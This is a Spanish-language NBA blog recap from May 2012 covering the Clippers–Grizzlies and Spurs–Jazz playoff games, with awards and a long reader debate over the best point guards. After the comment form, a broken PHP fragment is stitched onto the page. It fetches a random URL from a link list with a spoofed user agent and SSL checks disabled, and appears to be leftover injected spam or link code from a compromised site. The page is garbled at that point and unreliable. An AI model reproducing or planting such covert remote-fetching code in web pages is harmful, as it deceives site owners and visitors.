La Crónica: Marcar la diferencia

08 de May de 2012 por TheDeerHunter

Lo evidente va a ser hablar sobre lo bueno que es Chris Paul. En una eliminatoria extremadamente igualada en lo colectivo como es ésta, con tantos instantes críticos que van a tener lugar en ella, supone una ventaja muy grande darle el balón a un jugador de su categoría. Paul resolvió la prórroga (97-101), y con ella quizá la eliminatoria, con un auténtico monólogo. Antes había sido fundamental para resistir los arreones de los Grizzlies.

Lo evidente fue cómo resolvió en ataque, pero es que Paul, con su menudo físico, también es un bastión defensivo. De los casi 24 puntos (a 36 minutos) que promedia Conley, sólo la cuarta parte los obtiene ante el #3 Clipper. Es ahora cuando se justifican todos los esfuerzos de la franquicia por atraerle.

Por los Grizzlies están echando de menos al mejor Marc, que apenas apareció en ataque, como también a un Zach que no ha llegado bien a este momento. Entre el rebote ofensivo y la anotación de Gay y Conley procuraron equilibrar fuerzas, y faltó poco para lograrlo. El problema es que ambos están un escalón por debajo de los primeras espadas rivales y que al ataque de los Grizzlies le falta claridad en demasiadas ocasiones.


Los Jazz se van hoy de vacaciones. Ha sido un querer y no poder ante unos Spurs que, dejándose llevar, no les han dejado ni una sola opción. Ayer (87-81) pusieron toda la carne que les quedaba en el asador, con el frontcourt Millsap-Favors-Jefferson y una versión funcional de Devin Harris. Ninguna ayuda más. Los Spurs, en cambio, con 10 hombres produciendo.

Los pros es que los Jazz han arrasado en rebotes y ha sido el día en el que más les ha costado a sus rivales ver aro. La contra es que los de Popovich han hecho mucha sangre en el perímetro: 10 de 22 en triples, por 0 de 13 de Jazz. La serie de tiros de Utah se resume en el 0 de 15 entre Hayward y Burks.

PREMIOS

MVP: los Clippers dejan su fortuna en manos de Chris Paul, y este responde dando el triunfo a los suyos con un dominio absoluto de los minutos decisivos del partido. Las estadísticas de Blake Griffin (e incluso las de Conley) parecen mejores, pero el MVP del partido y de la noche fue sin duda CP3, autor de 27 puntos, 9 rebotes y 7 asistencias.

Rookie: no tuvo un bien día Kawhi Leonard y menos aún Alec Burks. Kanter, por su parte, dispuso de apenas 7 minutos en los que tuvo tiempo de colocar dos tapones y poco más.

Sorpresa: tal vez no debería de sorprendernos aquello que no es más que una repetición de lo sucedido en el partido anterior. Pero que Reggie Evans vuelva a ser decisivo en los Playoffs es algo con lo que uno no cuenta hasta que lo ve con sus propios ojos. Su energía y, sobre todo, sus rebotes de ataque fueron fundamentales en el triunfo de los Clippers.

Decepción: “unacceptable way for me to play this series”. El tweet de Gordon Hayward lo dice todo. Sus 0 puntos con 0 de 7 en tiros, 3 rebotes, 1 asistencia, 0 robos y 0 tapones de anoche son el remate para una actuación terrible por su parte en la eliminatoria ante los Spurs. Hayward, que había finalizado la temporada en un estado de forma soberbio, ha firmado en esta serie menos de un 20% de acierto (6 de 33) en tiros de campo.

Esfuerzo en vano: no decepcionó Al Jefferson en su despedida de la temporada. 26 puntos, con 13 de 19 en tiros, y 10 rebotes logró el pívot de los Jazz. Entre Big Al, Millsap y Favors dominaron la pintura con un total de 39 rebotes, y aun así no fue suficiente ante los Spurs.

Imágenes | AP Photos / Getty Images

Comenta

22 comentarios a esta entrada

  1. nba dice:
    #1

    Parece que Hollins va a tener que tirar de la mistica del año pasado, concienciar a sus exteriores que la primera opcion tiene que ser un pase a Zach-Gasol, que ellos decidan si sacarla o tirar, y a partir de ahi empezar a mover el balon, ya que si no consiguen sacar a Griffin y a Jordan del partido antes de tiempo por faltas no van a tener ninguna opcion.

      Citar

  2. rumbero dice:
    #2

    Yo me he visto el final café en mano y por un momento pensaba que por fin los ositos se llevarian un partido con final ajustado después de remontar 10 puntos a falta de 4 minutos. Pero parece que no son capaces y ahí Paul te destroza. 8 puntitos en la prórroga. De momento el MVP de PO. Bastante bien también Griffin a pesar de sus tiros libres. Por parte de Memphis, Conley y Gay (que a pesar de su 8/25 ha estado bien al final) aguantando. Mal Mayo. Y en lo que coincidimos todos: sin Zach y Marc entrando mucho más en juego es muy muy difícil. El primero no anda fino, cierto, y al segundo a mi me da la impresión que lo buscan poco. Como bien decía alguien no hace mucho ¿Quien es el único All Star del equipo?

    En fin, parece improbable que Memphis se lleve 3 seguidos, tienen la moral comida por los Clippers y CP3, pero quien sabe. Por lo menos que se alargue lo máximo posible que está siendo de largo la eliminatoria más entretenida

      Citar

  3. Nacho dice:
    #3

    Pues la he cagado en mis pronósticos. Como diría Mourinho, ¿por qué?
    Pues porque, y no le quiero quitar méritos a los Clippers, Memphis tiene demasiados apagones. Demasiados. Y los del primer partido van a pasar factura. Y hoy también lo han tenido, como en el tercero. Tras un mal partido por su parte se ajustan al inicio del cuarto cuarto e igualan, pero no son capaces de romper, consiguen, no se como, llevar el partido a la prórroga, y ahí Chris Paul les revienta. Hoy ha sido la única vez en toda la serie que han sido notablemente inferiores, y eso normalmente les daría un 3-1 a su favor o un 2-2, pero van 3-1 en contra. No están fluidos y creo que no están bien dirigidos. Creo que el único que en la serie que está bien es Conley, y un poco Allen. El resto debería reflexionar mucho. Dejarse de chorradas, aplastar a los angelinos en el próximo partido, y pelear el sexto. Chungo, pero equipo tienen. Yo ya no doy un duro por ellos, entre otras cosas porque no creo que Chris Paul deje pasar esta oportunidad.
    Y también debo reconocer hoy que he visto un partidazo de Griffin. Cuando debía y como debía. Incluso en los tiros libres solo ha estado mal.
    Y de los Spurs, pues eso, que soy muy viejo, y quiero ver unas finales SA / LAL, y luego cualquiera de éstos contra los Celtics. Claro quer como Brown me carga demasiado quiero un Popovich vs. Rivers. Sigo mi sueño.

      Citar

  4. el rey lagarto dice:
    #4

    Lo de no mirar a sus interiores va a ser la tumba de los ositos. Sobre todo a Marc que anda mejor que ZBo. Lo explica muy bien Daimiel aquí:
    http://blogs.canalplus.es/daimiel/2012/05/la-herida-de-los-grizzlies-.html

    Saludos a todos.
    Lagarto

      Citar

  5. simon dice:
    #5

    El primer partido marcó demasiado la eliminatoria y la marcó definitivamente. Si llegan a ganar el primero de paliza ( que era lo normal viendo como iban las cosas ) el segundo igualmente, estoy seguro de que se hubieran plantado en L.A con 2-0 se traian otro partido mas para Memphis y sentenciar ahi con 4-1. pero al perder el primer partido cambio todo el panorama justo a lo contrario.

      Citar

  6. Esteban dice:
    #6

    recuerdan como se me reian cuando dije q cp3 es el mejor base de la historia desp de magic? bue ha jugado esta temporada al menos 20 partidos como el de ayer, nadie ha cerrado tantos y mejor los juegos que el

    MVP de la regular sin dudas

      Citar

  7. rumbero dice:
    #7

    Esteban:
    recuerdan como se me reian cuando dije q cp3 es el mejor base de la historia desp de magic? bue ha jugado esta temporada al menos 20 partidos como el de ayer, nadie ha cerrado tantos y mejor los juegos que el

    MVP de la regular sin dudas

    No recuerdo que nadie se riera, es más, casi todos coincidimos en que es el mejor base de la liga y que está haciendo un auténtico temporadón. Simplemente comentamos que tu afirmación “es sin duda el segundo mejor base de la historia” se podría discutir bastante.
    Lo que está claro es que sobretodo gracias a él los Clippers estan con un 3-1 cuando pocos apostaban por ello. Y que con exhibiciones asi, sobretodo en PO, va a seguir agrandando su nombre. Coincido con Nacho en que no creo que deje escapar esta oportunidad, así que su próxima parada debería ser eliminar a los Spurs. Con él al mando, el aparente paso al frente de Griffin y teniendo en cuenta que siempre hay un par o tres de secundarios que rinden bien en cada partido… quien sabe

      Citar

  8. TheDeerHunter dice:
    #8

    Efectivamente nadie se rió… e independientemente de la extraordinaria actuación de él mi opinión no ha cambiado respecto a que sea el segundo mejor base de todos los tiempos.

      Citar

  9. Melo15 dice:
    #9

    Esteban lo que esta haciendo Paul, ya lo han hecho mas bases en la historia: Thomas, Magic, Robertson, Nash, Payton y cai todos ellos han ganado un anillo o se han quedado muy cerca, auqnue yo no discute que si Paull sigue asi no pueda estar entre ellos, pero no nos precipitemos.

      Citar

  10. Nacho dice:
    #10

    Esteban:
    recuerdan como se me reian cuando dije q cp3 es el mejor base de la historia desp de magic? bue ha jugado esta temporada al menos 20 partidos como el de ayer, nadie ha cerrado tantos y mejor los juegos que el

    MVP de la regular sin dudas

    Pues yo sí me reí. Dije, otra más de Esteban. Y es que tu humor, filias y fobias me molan, y me río. Tú y yo sabemos, y el resto también, que tus sentencias tienen mucho de ‘boutade’, y por eso molan, porque eres de excesos, y eso se necesita. Pero, vamos, ni tú te crees lo que dijiste. Es un pedazo de jugador, llamado a ser uno de los grandes, pero…
    Por cierto, ayer partidazo de él.
    Y te recuerdo que de Lin decías lo mismo, o casi.
    Y te lo digo con cariño, sin ti esto no sería lo mismo, jeje.

      Citar

  11. HisRoyalAirness dice:
    #11

    Lo de que Chris Paul es el mejor base de la historia después de Magic… recuerdo a uno que jugaba en Salt Lake City que tendría algo que decir al respecto, por no decir alguno más. Y bueno, con las exhibiciones que está haciendo Rondo tampoco tengo yo claro quién es el mejor base puro. Anotando? Sin duda.

    Lo de los Grizzlies de verdad que es para matarlos, qué ganas tienen de mantenerme las noches despierto. No puede ser que Gay se tire 20 tiros por noche; por qué? Pues porque no. No tiene credenciales suficientes como para absorber esa cantidad de juego. La mejor actuación de Rudy Gay en unos playoffs ha sido…quedándose lesionado en el banquillo, el pasado año. Hay que redefinir roles. Tienes a 2 chavalitos de los Clippers en la pintura, jugando su primera ronda de playoffs. Balones dentro desde el minuto a 1 a Marc y Z-Bo y haciendo “pump-fakes” los sacas del partido en un cuarto; así de claro.
    Y la culpa no es de Gay, la culpa es de quien no le dice que deje de tirar. Marc también está contribuyendo con sus pocas ganas de balón, hay que tener más cojones y demostrar jerarquía. Aunque bueno, ayer también contribuyeron lo suyo los árbitros

      Citar

  12. simon dice:
    #12

    HisRoyalAirness:
    Lo de que Chris Paul es el mejor base de la historia después de Magic… recuerdo a uno que jugaba en Salt Lake City que tendría algo que decir al respecto, por no decir alguno más. Y bueno, con las exhibiciones que está haciendo Rondo tampoco tengo yo claro quién es el mejor base puro. Anotando? Sin duda.

    Anotando? Parker como mínimo a la par.

      Citar

  13. simon dice:
    #13

    simon: Anotando? Parker como mínimo a la par.

    pienso yo, al menos este año. No estoy diciendo que Parker sea mejor que Paul ni mucho menos, pero este año el mejor base de largo ha sido Parker. No obstante para mi equipo elegiria siempre a Paul. Estoy deseando que se encuentren en las semis de PO menudo duelo de los dos bases mas en forma de la competicion con permiso de Rondo.

      Citar

  14. Lucho dice:
    #14

    Perdon, pero para mi anotando el mejor es Rose. Luego Westbrook y Parker

    Ya lo dije en otra oportunidad, pero lo aclaro para evitar confusiones:

    Los mejores me parecen 1-Paul 2-Rondo
    Aunque por trayectoria Nash y Kidd son superiores
    Y en el equipo del año pondria a Parker. Y, quizas, tambien a Paul (en lugar del mejor jugador de toda la NBA, pero que no de esta temporada, KB)

      Citar

  15. Lucho dice:
    #15

    A Paul no lo condisidero el mejor anotador (Rose, West, Paker) ni el mejor asistidor (Rondo, Nash), pero si el que mejor sabe que hacer en cada momento, el mejor en el clutch y los momentos calientes y el que mejor entiende el juego. Aparte de ser top en todo: anotando (entre los mejores 4), asistiendo (2), defendiendo (1º, por sobre Rondo y Conley) y robando (1º, por sobre Rondo y Conley). Por eso es el mejor
    En rebotes creo que no es taan top, creo

      Citar

  16. MagicJohnson32 dice:
    #16

    Guau, os pasáis a Deron por el forro. Interesante…

      Citar

  17. Lucho dice:
    #17

    Yo a Deron lo ubicaria en un 4º-5º puesto. Paul, Rondo y Rose me parecen mejores
    Quizas deberia haberlo nombrado recien en los mejores anotadores o asistidores, donde merece un lugar. Pero no lo considero top3. Hay overbooking de bases. Cuarto o quinto si

      Citar

  18. Lucho dice:
    #18

    No se pierdan el triple de Garnett al finalizar el primer cuarto (si, leyeron bien)

      Citar

  19. Lucho dice:
    #19

    Rectifico. Al final le dieron doble

      Citar

  20. Sancho88 dice:
    #20

    Hay que ver, el bueno de Rondo acertando siempre con los pases, con la defensa, con todo, y en la última jugada la roba y se la come… No sé si les quedaba aún algún tiempo muerto, que creo que no, pero vamos, en los dos tiempos que pidió Atlanta deberían haber planificado algo por si robaban la pelota, como al final sucedió. Al final se achantaron los Celtis en ataque, apareciendo poquísimo Garnett en el último cuarto. Victoria merecida de Hawks, aunque lamentables con las pérdidas como en toda la eliminatoria. Ojito porque Alfonso ha vuelto. La pintura halconera ya no es una madre

      Citar

  21. nba dice:
    #21

    Yo creo que el hecho de que se “desprecie” a Deron viene por el pifostio que monto el solito en Utah

      Citar

  22. Ru dice:
    #22

    Lo que dice Royal sobre Rudy Gay y Marc es fundamental para los ositos.Yo a Randolph no le pido que de más porque está claro que le falta temporada y no podrá estar a ese nivel magnífico de los PO de la pasada campaña y es ahí donde Marc debe demostrar que vale 10 millones al año,echarle un poco de cojones al asunto y que no te coman la tostada,que un jugador como él se la ha comido Reggie unas cuantas veces en esta serie.

    Y lo de Gay -de este último partido- ha sido modo Kobe total,tirándose tiros que bueno…de risa en qué situaciones se las tira en ocasiones.Me parece una copia inacabada de LeBron.Rudy Gay bueno…pero no tanto.

    Confio en ellos para el partido de esta noche y luego ya se verá,pero contra estos Spurs veo más opciones a Clippers que a Memphis (no muchas más que vaya como están los texanos)

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>